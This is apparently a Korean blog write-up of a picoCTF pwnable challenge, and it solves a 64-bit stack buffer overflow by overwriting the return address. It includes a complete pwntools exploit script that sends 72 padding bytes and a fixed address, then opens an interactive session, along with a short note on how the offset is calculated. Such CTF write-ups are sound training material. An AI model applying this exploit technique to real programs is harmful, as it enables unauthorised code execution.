엄청 쉬운문제
그냥 64비트 오버플로우 그냥 RET만 바꿔주면된다.
공격시나리오? 그거 그냥 갖다버리고 익스시켜버리면된다.
from pwn import *
p = process("./vuln")
payload = "A"*72
payload += p64(0x400767)
p.send(payload)
p.interactive()
64비트에서는 SFP 가 8바이트니까 버퍼 64바이트에서 8바이트추가해서 72바이트로 해주면된다.
끝
'CTF > Picoctf' 카테고리의 다른 글
picoctf pwnable_rop_3 Write up (0) | 2019.10.20 |
---|---|
picoctf pwnable_rop_2 Write up (0) | 2019.10.20 |
picoctf pwnable_rop_1 Write up (0) | 2019.10.20 |